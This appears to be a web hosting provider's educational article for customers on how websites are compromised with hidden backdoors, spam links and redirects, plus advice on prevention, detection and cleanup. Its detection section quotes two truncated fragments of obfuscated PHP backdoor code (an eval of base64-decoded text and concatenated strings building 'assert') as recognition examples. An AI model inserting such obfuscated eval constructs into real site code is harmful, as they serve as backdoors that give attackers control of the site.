Dissecting web site attacks: What you should know.

The Internet has become a money making machine for many people. We’re really happy to see this as it’s allowed many of our customers to become successful. A customer with a successful web business is bound to be a customer that pays their hosting bill on time! Unfortunately there are also unscrupulous noogoodnicks whom will do ANYTHING to make another dollar. Some of their favorite forms of monetization include infecting sites with hidden spam links, stealing a site’s traffic via redirects, uploading phishing pages, or even worse – turning a site into a node for a web-based botnet that sells access to the highest bidder on an underground forum or IRC channel.

Attacks on web sites and applications have evolved rapidly over the last decade along with the rise of global internet access and dependence. As is always the case, an increase in money exchanging hands and the related comfort level with those monetary exchanges has brought the Internet to the forefront of revenue creation models by criminal gangs and crooks of all sorts.

Long gone are the days where the worst a site owner could expect when their site is compromised was a modification to the site’s front page content, usually including some sort of nasty message or witty prose. Current web-based attacks do their best to cover their exploit tracks in order to allow the attackers maximum time to do their criminal nastiness. This works in the attacker’s favor because as long as the website owner believes that their site looks and functions as intended, then there isn’t a second thought given to potentially being compromised by fraudsters and nogoodnicks.

Understanding these criminals and their intentions will prepare you to deal with them effectively when they cross your path.

Scene One: “The Attack!”

The criminal’s goal is simple: Infect as many sites and systems as possible without getting detected and cash in by providing access to these infected systems. This attack starts with scanning software that is armed with known vulnerabilities and insecure passwords. The attack rapidly scans random IPs and search engines for any trace of web sites with known vulnerabilities. Once a target is compromised the attackers then upload backdoor shells and hide them on the site somewhere that will not be detected. As you may have guessed, the backdoor shells they uploaded have the ability to run the same scanning mechanisms and will be used to compromise more sites and expand the network controlled by the criminal!

The above alone doesn’t generate a criminal any cash. All they will have is a list of ‘attack nodes’ at their disposal. This is when the entrepreneurial criminal comes into play. They will hold onto part of their attack nodes and keep them safe, while offering access to the other nodes for a price… And who would buy access to these nodes? More criminals of course!

By this time the site has been compromised for days, weeks or even months and will begin to show signs of having been exploited. The original criminal will at some point sell access to spammers. As career spammers are affectionately known to do, they will upload spam pages (pharmacy and phishing pages are common); or they sell your site to some shady marketing people to use your site in a BlackHat SEO campaign to boost a spammy site. Besides spammers it is also common for these criminals to sell to other criminals for their own botnets. They will pay for access to the backdoor just to upload their own backdoor! (criminals stealing from the criminals, what else would they expect?)

In the end, it isn’t uncommon to see a site compromised and then eventually end up looking like a hot mess with dozens of backdoors uploaded and hidden all over the web site. In the worst cases spammer links are injected on every page on the site, making it so every visitor whom is simply looking for your site, “Bob’s Toy Emporium” on popular search engines somehow finds themselves redirected to purchase little blue pills on a not so legitimate site.

Scene Two: “Don’t Let The Bad Guys Win!” (aka: “What YOU Can Do”)

Prevention!
It’s easier to stop the attackers before they hit than to clean up after them. The vast majority of web based attacks can be prevented by choosing a strong passphrase (P.S. You should also use sFTP instead of normal FTP, change your habit today!) and upgrading website software as soon as there is an update available! We make updating many popular website software applications easy with our One-Click Installation system — plugins, add-ons or custom code would still be your responsibility to upgrade though.

Detection!
“Because knowing is half the battle.”
Be aware of the files on your site and take an occasional review of them. See something out of place? Check into it! If it looks like a blind and rabid cat got a hold of the keyboard, then you might just have a problem (a problem that may be worse than if you actually had a blind rabid cat on your hands.) Here are some quick examples of malicious code we commonly see appended to website files:

eval(base64_decode(“aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydC

or

$HixNlV=’as’;$eQovrf=’e';$xsEWcg=$HixNlV.’s’.$eQovrf.’r’.’t';$HtJYXB=’b’.$HixNlV.$eQovrf

The attackers use many methods to obfuscate the purpose of their backdoors, but they all have in common the fact they don’t want you to be able to understand what their purpose is. There are some exceptions, but if a file doesn’t seem to belong on your site and you didn’t put it there then there should be reason believe that you have been exploited.

Scene Three:
What do you do if you think you’re compromised? Undo what the attackers did and secure your site from further abuse.

It is vital that you remove all added backdoors from your site and take action to prevent further attacks. These two steps are a lot easier than most people think, but you can not be lazy about them. First, check your site’s files for changes and file modifications. If you find anything that doesn’t belong there you need to disable/quarantine/remove it! Be sure to double-check that all of your sites’ software has been upgraded to the latest versions so known security holes are closed. Finally, Don’t forget to make sure you change your passwords (FTP, SSH, MySQL) too, just in case those may have been compromised as well.

What’s that? Your site has over 1,000 files and you want the site’s web master to check them all? Oh my!

You can tackle two problems at once, backups and security with the following tip. If a site is worth spending 10 minutes writing content for, then you should keep a backup of your site on your home/office computer. This backup will not only help you to get your site back online after almost any disaster, it will also help you identify any changes the attackers made to your site!

How? Well, since you’re now a savvy website owner who keeps clean and secure backups locally, you can download the “compromised” version of your site and use file comparison software* to compare it to a clean version to see exactly what has changed. You’ll also be better prepared for a possible “cyber forensics” role in the next episode of CSI…

*(search online for “compare directories” plus your operating system of choice and you will find tons of options!)

By now your site should be secure (knock on wood) so you can place it back online knowing the bad guys have less nodes to attack other websites and servers from. If you haven’t already though, please contact our support staff and let us know that you think you’ve been hacked. Our security team will then run a basic scan on your site’s files, and if we see any insecure software or have any known backdoors running on your site we will let you know!